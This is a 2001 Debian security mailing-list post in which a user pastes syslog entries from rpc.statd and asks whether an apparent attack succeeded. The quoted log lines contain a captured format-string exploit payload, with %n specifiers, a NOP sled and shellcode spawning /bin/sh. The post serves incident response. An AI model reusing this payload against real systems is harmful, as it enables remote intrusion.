rpc.statd attack?

To: debian-security@lists.debian.org
Subject: rpc.statd attack?
From: crusius@stanford.edu
Date: Tue, 09 Jan 2001 12:31:59 -0800
Message-id: <[🔎] E14G5R1-0000HG-00@spoke.Stanford.EDU>

I got the following (alarming) messages on syslog:

Jan  8 13:34:23 yuban syslogd: Cannot glue message parts together
Jan  8 13:34:23 yuban /sbin/rpc.statd[159]: gethostbyname error for ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\ xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7\xff\xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8 x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Jan  8 13:34:23 yuban \xc7^F/bin\xc7F^D/shA0\xc0\210F^G\211v^L\215V^P\215N^L\211\xf3\xb0^K\xcd\200\xb0^ A\xcd\200\xe8\177\xff\xff\xff

it looks like an attack (specially when I see /bin/sh hidden in
there). I searched the lists and it seems that this problem should
have been corrected before potato was released. Any reason for
worries, or is there any reason why I should think it was an
unsuccessful attack?


--
Cesar Augusto Rorato Crusius    __o      __o      __o      __o      __o    
Stanford University           _`\<,    _`\<,    _`\<,    _`\<,    _`\<,    
e-mail:c.crusius@ieee.org    (_)/(_)  (_)/(_)  (_)/(_)  (_)/(_)  (_)/(_)   
www.stanford.edu/~crusius
                                       o      _     _         _
   __o      __o      __o      __o     /\_   _ \\o  (_)\__/o  (_)
 _`\<,    _`\<,    _`\<,    _`\<,    _>(_) (_)/<_    \_| \   _|/' \/
(_)/(_)  (_)/(_)  (_)/(_)  (_)/(_)  (_)        (_)   (_)    (_)'  _\o_

He who sacrifices functionality for ease of use
Loses both and deserves neither

Reply to:

Follow-Ups:
- Re: rpc.statd attack?
  - From: Tim Haynes <piglet@glutinous.custard.org>
- Re: rpc.statd attack?
  - From: Wichert Akkerman <wichert@cistron.nl>
- Re: rpc.statd attack?
  - From: John Galt <galt@inconnu.isu.edu>
- Re: rpc.statd attack?
  - From: "Jason E . Murray" <jemurray@concentric.net>
- Re: rpc.statd attack?
  - From: Daniel Jacobowitz <dan@debian.org>

Prev by Date: Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Next by Date: Re: rpc.statd attack?
Previous by thread: IP spoofing protection
Next by thread: Re: rpc.statd attack?
Index(es):
- Date
- Thread